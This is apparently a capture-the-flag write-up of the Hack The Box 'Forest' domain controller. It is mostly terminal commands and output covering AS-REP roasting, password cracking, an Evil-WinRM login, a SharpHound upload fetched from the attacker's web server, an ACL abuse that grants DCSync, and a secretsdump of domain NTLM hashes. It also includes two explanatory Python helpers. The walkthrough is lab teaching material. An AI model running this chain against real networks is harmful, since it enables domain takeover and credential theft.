Forest is an easy Windows box released back in October 2019.
As always we begin our enumeration with Nmap to find open ports, using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.0.0.10/16 ] [ /dev/pts/27 ] [Documents/Github/void.yt]
→ nmap -sCV 10.10.10.161
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 17:55 CEST
Nmap scan report for 10.10.10.161
Host is up (0.34s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-24 16:10:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h34m28s, deviation: 4h02m30s, median: 14m28s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2021-05-24T09:10:39-07:00
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-05-24T16:10:42
|_ start_date: 2021-05-24T16:09:41
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
Our nmap scan picked up the RPC service, so let's run enum4linux:
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ enum4linux 10.10.10.161
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 24 18:06:21 2021
[...]
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
[...]
Now we have a list of users, obtained over RPC because NULL sessions are allowed. svc-alfresco is most likely a service account, so let's check whether it has Kerberos pre-authentication disabled and grab its AS-REP hash with GetNPUsers.py:
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ locate GetNPUsers.py
/usr/share/doc/python3-impacket/examples/GetNPUsers.py
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ cp $(locate GetNPUsers.py) .
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ python3 GetNPUsers.py htb.local/svc-alfresco -no-pass -dc-ip 10.10.10.161
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:89d4b785e7c6fc54c5c43fcaa3cb5065$72428ed743715742a137061f08baed2741d3b13fa9e7d5139ad362374207de52ceea2d1c4c6c851ec3f5418e9770fbd7ee9e4a98be09e5fdbdd3c2adc308df47be4e45ed86d7dac2af93fffeba10958f5f9993074ced0856a5b7bda28b5429eef42f401335dbed30bb66cebaaf95805b04967da19640d5887b84cd7208878b802c2914bdba0705d944b5065fb05207a00ff3b1239fdc47686b7c4feee1ab5cf3b11c85d4426b099ff17af0b7b75e0cde27686a2dd0c406a9022ebc59da30b9e4413aecb46f8cdd835d5950a588b56ba671964d2f3aac364c403fc97bd8f38ff7c8ab49053cef
And we got svc-alfresco's AS-REP, a hash that contains data encrypted with a key derived from the account's password. This works because 'Do not require Kerberos preauthentication' is set on svc-alfresco, so the KDC returns this encrypted blob without first checking that we know the password. The next step is to brute-force the hash itself offline:
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ vim hash.txt
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ cat hash.txt
$krb5asrep$23$svc-alfresco@HTB.LOCAL:89d4b785e7c6fc54c5c43fcaa3cb5065$72428ed743715742a137061f08baed2741d3b13fa9e7d5139ad362374207de52ceea2d1c4c6c851ec3f5418e9770fbd7ee9e4a98be09e5fdbdd3c2adc308df47be4e45ed86d7dac2af93fffeba10958f5f9993074ced0856a5b7bda28b5429eef42f401335dbed30bb66cebaaf95805b04967da19640d5887b84cd7208878b802c2914bdba0705d944b5065fb05207a00ff3b1239fdc47686b7c4feee1ab5cf3b11c85d4426b099ff17af0b7b75e0cde27686a2dd0c406a9022ebc59da30b9e4413aecb46f8cdd835d5950a588b56ba671964d2f3aac364c403fc97bd8f38ff7c8ab49053cef
[ 10.0.0.10/16 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ john -w=/usr/share/wordlists/rockyou.txt hash.txt
[...]
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
[...]
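Two checks behind the step above, as added example code that is not from the writeup or from Impacket: a parser for the $krb5asrep$23$ line GetNPUsers.py printed (etype, user@REALM, 16-byte HMAC-MD5 checksum, ciphertext) and a test of the userAccountControl bit that 'Do not require Kerberos preauthentication' sets, which is what a defender would audit for. The sample hash line and the account list are constructed.

```python
import re
from dataclasses import dataclass

# userAccountControl bit set by "Do not require Kerberos preauthentication".
UF_DONT_REQUIRE_PREAUTH = 0x400000
# Kerberos encryption type 23 is RC4-HMAC: the key is the NT hash of the password and the
# checksum field is a 16-byte HMAC-MD5, which is why john can test candidates offline.
ETYPE_RC4_HMAC = 23

# Layout GetNPUsers.py prints for etype 23: $krb5asrep$<etype>$<user>@<REALM>:<checksum>$<cipher>
_ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$:]+)@(?P<realm>[^:$]+):"
    r"(?P<checksum>[0-9a-fA-F]+)\$(?P<cipher>[0-9a-fA-F]+)$"
)


@dataclass
class AsRepHash:
    etype: int
    user: str
    realm: str
    checksum: bytes
    cipher: bytes


def parse_asrep_hash(line):
    """Split one $krb5asrep$ line into its fields, validating the RC4-HMAC checksum size."""
    m = _ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line in the etype-23 layout")
    parsed = AsRepHash(
        etype=int(m["etype"]),
        user=m["user"],
        realm=m["realm"],
        checksum=bytes.fromhex(m["checksum"]),
        cipher=bytes.fromhex(m["cipher"]),
    )
    if parsed.etype == ETYPE_RC4_HMAC and len(parsed.checksum) != 16:
        raise ValueError("RC4-HMAC AS-REP checksum must be 16 bytes")
    return parsed


def preauth_disabled(user_account_control):
    """True when the KDC will answer an AS-REQ for this account without pre-authentication."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)


def audit_accounts(records):
    """records: iterable of (sAMAccountName, userAccountControl) pairs, e.g. from an LDAP export.
    Returns the names whose AS-REP can be requested without a password (AS-REP roastable)."""
    return [name for name, uac in records if preauth_disabled(uac)]


# Constructed sample line in the format shown above; the ciphertext is truncated to 16 bytes,
# so it is for parsing only.
SAMPLE_HASH = ("$krb5asrep$23$svc-alfresco@HTB.LOCAL:"
               "89d4b785e7c6fc54c5c43fcaa3cb5065$72428ed743715742a137061f08baed27")

# Constructed userAccountControl values (0x200 NORMAL_ACCOUNT, 0x10000 DONT_EXPIRE_PASSWORD,
# 0x400000 DONT_REQUIRE_PREAUTH); these are not the real values from the box.
SAMPLE_ACCOUNTS = [
    ("svc-alfresco", 0x410200),
    ("andy", 0x10200),
    ("sebastien", 0x200),
]

if __name__ == "__main__":
    h = parse_asrep_hash(SAMPLE_HASH)
    print(f"etype={h.etype} user={h.user} realm={h.realm} checksum={h.checksum.hex()}")
    print("pre-auth disabled:", audit_accounts(SAMPLE_ACCOUNTS))
```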
And now that we have svc-alfresco's password, let's use evil-winrm to log in:
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ sudo gem install evil-winrm
Fetching nori-2.6.0.gem
Fetching rubyntlm-0.6.3.gem
Fetching multi_json-1.15.0.gem
Fetching little-plugger-1.1.4.gem
Fetching gyoku-1.3.1.gem
Fetching logging-2.3.0.gem
Fetching httpclient-2.8.3.gem
Fetching builder-3.2.4.gem
Fetching gssapi-1.3.1.gem
Fetching evil-winrm-2.4.gem
Fetching winrm-2.3.6.gem
Fetching winrm-fs-1.3.5.gem
Fetching erubi-1.10.0.gem
Successfully installed rubyntlm-0.6.3
Successfully installed nori-2.6.0
Successfully installed multi_json-1.15.0
Successfully installed little-plugger-1.1.4
Successfully installed logging-2.3.0
Successfully installed httpclient-2.8.3
Successfully installed builder-3.2.4
Successfully installed gyoku-1.3.1
Successfully installed gssapi-1.3.1
Successfully installed erubi-1.10.0
Successfully installed winrm-2.3.6
Successfully installed winrm-fs-1.3.5
Happy hacking! :)
Successfully installed evil-winrm-2.4
[...]
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> sysinfo
The term 'sysinfo' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ sysinfo
+ ~~~~~~~
+ CategoryInfo : ObjectNotFound: (sysinfo:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> systeminfo
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
+ systeminfo
+ ~~~~~~~~~~.
At line:1 char:1
+ systeminfo
+ ~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get to the user flag.
Now let's check the users on this machine:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net users
User accounts for \\
-------------------------------------------------------------------------------
$331000-VK4ADACQNUCA Administrator andy
DefaultAccount Guest HealthMailbox0659cc1
HealthMailbox670628e HealthMailbox6ded678 HealthMailbox7108a4e
HealthMailbox83d6781 HealthMailbox968e74d HealthMailboxb01ac64
HealthMailboxc0a90c9 HealthMailboxc3d7722 HealthMailboxfc9daad
HealthMailboxfd87238 krbtgt lucinda
mark santi sebastien
SM_1b41c9286325456bb SM_1ffab36a2f5f479cb SM_2c8eef0a09b545acb
SM_681f53d4942840e18 SM_75a538d3025e4db9a SM_7c96b981967141ebb
SM_9b69f1b9d2cc45549 SM_c75ee099d0a64c91b SM_ca8c2ed5bdab4dc9b
svc-alfresco
The command completed with one or more errors.
Now we need to do some AD recon, and for that we're going to use BloodHound:
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ sudo apt install bloodhound -y
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ bloodhound
Here we see that we need to connect to the neo4j database, so let's start it up with sudo privileges:
[ 10.10.14.13/23 ] [ /dev/pts/28 ] [~/HTB/Forest]
→ sudo neo4j console
[sudo] password for nothing:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /usr/share/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
run: /usr/share/neo4j/run
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2021-05-24 16:45:38.529+0000 INFO Starting...
2021-05-24 16:45:40.163+0000 INFO ======== Neo4j 4.2.1 ========
2021-05-24 16:45:41.980+0000 INFO Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2021-05-24 16:45:41.985+0000 INFO Setting up initial user from defaults: neo4j
2021-05-24 16:45:41.986+0000 INFO Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2021-05-24 16:45:42.003+0000 INFO Setting version for 'security-users' to 2
2021-05-24 16:45:42.009+0000 INFO After initialization of system graph model component 'security-users' have version 2 and status CURRENT
2021-05-24 16:45:42.015+0000 INFO Performing postInitialization step for component 'security-users' with version 2 and status CURRENT
2021-05-24 16:45:42.697+0000 INFO Bolt enabled on localhost:7687.
2021-05-24 16:45:43.379+0000 INFO Remote interface available at http://localhost:7474/
2021-05-24 16:45:43.380+0000 INFO Started.
Now let's log into it with the default credentials neo4j:neo4j; on first login Neo4j asks us to set a new password. Once that's done, start BloodHound and log in with the new credentials.
Next we're going to use the BloodHound ingestor, SharpHound.ps1, to collect the Active Directory data and find the path to the AD administrators. To do so we're going to make use of our Evil-WinRM session:
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
→ sudo updatedb
[sudo] password for nothing:
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
→ locate SharpHound.ps1
/usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
/usr/share/metasploit-framework/data/post/powershell/SharpHound.ps1
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
→ cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ ls -lash SharpHound.ps1
952K -rw-r--r-- 1 nothing nothing 952K May 24 18:57 SharpHound.ps1
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Now here we need to upload SharpHound.ps1:
[ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Forest]
→ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> iwr -uri "http://10.10.14.13/SharpHound.ps1" -outfile "sharp.ps1"
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/24/2021 10:24 AM 974235 sharp.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./sharp.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> invoke-bloodhound -CollectionMethod All
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/24/2021 10:41 AM 15196 20210524104146_BloodHound.zip
-a---- 5/24/2021 10:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 5/24/2021 10:24 AM 974235 sharp.ps1
Running sharp.ps1 produced a zip file, so let's copy it back to our Kali machine using Evil-WinRM's built-in download function:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20210524104146_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Documents\20210524104146_BloodHound.zip to 20210524104146_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> exit
Info: Exiting with code 0
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ ls -lashg 20210524104146_BloodHound.zip
16K -rw-r--r-- 1 nothing 15K May 24 19:39 20210524104146_BloodHound.zip
[ 10.0.0.10/16 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ ls -lash 20210524104146_BloodHound.zip
16K -rw-r--r-- 1 nothing nothing 15K May 24 19:39 20210524104146_BloodHound.zip
Now that we got the zip file locally, let's load it in bloodhound:
So here we finally see what's going on, and we can find the shortest path to domain admin:
svc-alfresco has GenericAll rights on the Exchange Windows Permissions group, so we can add our user to that group. The group in turn has WriteDacl on the domain object, which lets us grant DCSync rights to our compromised user and retrieve the NTLM hashes of every account in the domain. To exploit the ACL path automatically we can use aclpwn:
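The ACL path just described, worked as a small graph search over BloodHound-style edges: added example code, not part of the writeup and not BloodHound's or aclpwn's own logic. The edge list is constructed to mirror the path above plus a few unrelated edges; principals_reaching is the defender's view, listing everything that has a control path to the domain object.

```python
from collections import deque

# Edge kinds BloodHound draws as control relationships: a member inherits its group's
# rights (MemberOf), and the ACL rights below let the holder take over the target object.
TRAVERSABLE = {"MemberOf", "GenericAll", "GenericWrite", "WriteDacl",
               "WriteOwner", "Owns", "AddMember", "AllExtendedRights", "DCSync"}

# Constructed (source, edge, target) triples; not SharpHound output.
EDGES = [
    ("SVC-ALFRESCO@HTB.LOCAL", "GenericAll", "EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL"),
    ("EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL", "WriteDacl", "HTB.LOCAL"),
    ("SVC-ALFRESCO@HTB.LOCAL", "MemberOf", "DOMAIN USERS@HTB.LOCAL"),
    ("ANDY@HTB.LOCAL", "MemberOf", "DOMAIN USERS@HTB.LOCAL"),
    ("ADMINISTRATOR@HTB.LOCAL", "MemberOf", "DOMAIN ADMINS@HTB.LOCAL"),
    ("DOMAIN ADMINS@HTB.LOCAL", "GenericAll", "HTB.LOCAL"),
]


def build_graph(edges):
    """Adjacency list keeping only edge kinds that confer control."""
    graph = {}
    for src, kind, dst in edges:
        if kind in TRAVERSABLE:
            graph.setdefault(src, []).append((kind, dst))
    return graph


def shortest_path(edges, start, goal):
    """Breadth-first search; returns [(src, edge, dst), ...] or None if goal is unreachable."""
    graph = build_graph(edges)
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for kind, nxt in graph.get(node, []):
            if nxt not in parent:          # first visit is the shortest in hop count
                parent[nxt] = (node, kind)
                queue.append(nxt)
    if goal not in parent:
        return None
    path, node = [], goal
    while parent[node] is not None:
        prev, kind = parent[node]
        path.append((prev, kind, node))
        node = prev
    return list(reversed(path))


def principals_reaching(edges, target):
    """Every node with a control path to target, i.e. the set a defender should review."""
    reverse = {}
    for src, adj in build_graph(edges).items():
        for _kind, dst in adj:
            reverse.setdefault(dst, set()).add(src)
    seen, stack = set(), [target]
    while stack:
        node = stack.pop()
        for src in reverse.get(node, ()):
            if src not in seen:
                seen.add(src)
                stack.append(src)
    return seen


if __name__ == "__main__":
    for src, kind, dst in shortest_path(EDGES, "SVC-ALFRESCO@HTB.LOCAL", "HTB.LOCAL"):
        print(f"{src} --{kind}--> {dst}")
    print("can reach the domain object:", sorted(principals_reaching(EDGES, "HTB.LOCAL")))
```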
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ pip install aclpwn
Collecting aclpwn
Downloading aclpwn-1.0.0-py3-none-any.whl (17 kB)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from aclpwn) (2.25.1)
Requirement already satisfied: ldap3>=2.5 in /usr/lib/python3/dist-packages (from aclpwn) (2.8.1)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from aclpwn) (0.9.22)
Collecting neo4j-driver
Downloading neo4j-driver-4.2.1.tar.gz (69 kB)
|████████████████████████████████| 69 kB 1.6 MB/s
Requirement already satisfied: pytz in /usr/lib/python3/dist-packages (from neo4j-driver->aclpwn) (2021.1)
Building wheels for collected packages: neo4j-driver
Building wheel for neo4j-driver (setup.py) ... done
Created wheel for neo4j-driver: filename=neo4j_driver-4.2.1-py3-none-any.whl size=95273 sha256=2b8a5fca03df766fe46cfdcd83ef272170de7f3d1000c49c114ae78bd4efeea1
Stored in directory: /home/nothing/.cache/pip/wheels/fe/a2/12/36d9ab6287417260db156b6021d409f296d274a11f23373cfe
Successfully built neo4j-driver
Installing collected packages: neo4j-driver, aclpwn
WARNING: The script aclpwn is installed in '/home/nothing/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed aclpwn-1.0.0 neo4j-driver-4.2.1
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ PATH=$PATH:/home/nothing/.local/bin
[ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Forest]
→ aclpwn -f svc-alfresco -ft user -t htb.local -tt domain -d htb.local -dp bloodhound -du neo4j --server 10.10.10.161 -u svc-alfresco -sp s3rvice -p s3rvice
So you can use that, or you can also just do it manually as follows:
[ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Forest]
→ evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" svc-alfresco /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user svc-alfresco
User name svc-alfresco
Full Name svc-alfresco
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/24/2021 11:15:40 AM
Password expires Never
Password changeable 5/25/2021 11:15:40 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/24/2021 9:27:15 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Exchange Windows Perm*Domain Users
*Service Accounts
The command completed successfully.
So here we added svc-alfresco to the Exchange Windows Permissions group in HTB.LOCAL. The next step is to grant svc-alfresco DCSync privileges using PowerView, so we first build a credential object for it:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 's3rvice' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
Obviously we need PowerView.ps1 on the box, so let's first copy it to the local directory from which we started the Evil-WinRM session:
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
→ locate PowerView.ps1
/usr/lib/python3/dist-packages/cme/data/powersploit/Recon/PowerView.ps1
/usr/share/windows-resources/powersploit/Recon/PowerView.ps1
Be careful: these are outdated copies of PowerView.ps1, so get the most recent one instead:
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
→ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -O PowerView.ps1
--2021-05-24 20:16:08-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 770279 (752K) [text/plain]
Saving to: ‘PowerView.ps1’
PowerView.ps1 100%[===================================================================================================================================================>] 752.23K 3.25MB/s in 0.2s
2021-05-24 20:16:08 (3.25 MB/s) - ‘PowerView.ps1’ saved [770279/770279]
Now we upload PowerView to the machine:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/24/2021 10:41 AM 15196 20210524104146_BloodHound.zip
-a---- 5/24/2021 10:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 5/24/2021 11:31 AM 770279 PowerView.ps1
-a---- 5/24/2021 10:24 AM 974235 sharp.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> remove-module PowerView
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> import-module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $pass = convertto-securestring 's3rvice' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "svc-alfresco" -Rights DCSync
From there we can use secretsdump.py to DCSync the hashes of all domain users:
secretsdump.py svc-alfresco:s3rvice@10.10.10.161
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[...]
[*] Cleaning up...
And finally we simply use the Administrator hash with psexec.py. If you don't have it yet, install Impacket as follows:
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
→ git clone https://github.com/SecureAuthCorp/impacket.git
Cloning into 'impacket'...
remote: Enumerating objects: 19239, done.
remote: Counting objects: 100% (339/339), done.
remote: Compressing objects: 100% (205/205), done.
remote: Total 19239 (delta 193), reused 232 (delta 133), pack-reused 18900
Receiving objects: 100% (19239/19239), 6.61 MiB | 4.26 MiB/s, done.
Resolving deltas: 100% (14585/14585), done.
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [~/HTB/Forest]
→ cd impacket
[ 10.10.14.13/23 ] [ /dev/pts/30 ] [HTB/Forest/impacket]
→ sudo pip3 install .
[sudo] password for nothing:
Processing /home/nothing/HTB/Forest/impacket
Requirement already satisfied: chardet in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (4.0.0)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (1.1.2)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.18.2)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.9.3)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (20.0.1)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (3.9.7)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket==0.9.23.dev1+20210519.170900.2f5c2476) (1.16.0)
Building wheels for collected packages: impacket
Building wheel for impacket (setup.py) ... done
Created wheel for impacket: filename=impacket-0.9.23.dev1+20210519.170900.2f5c2476-py3-none-any.whl size=1397782 sha256=39758aa69b8434256a2f79b26209d55225fecd0090950c922499e17de963a10f
Stored in directory: /tmp/pip-ephem-wheel-cache-ln48imhy/wheels/7a/85/ca/606ceaff4c6e06dc108bb711bd0c0de17bc79b379a138a14c9
Successfully built impacket
Installing collected packages: impacket
Attempting uninstall: impacket
Found existing installation: impacket 0.9.22
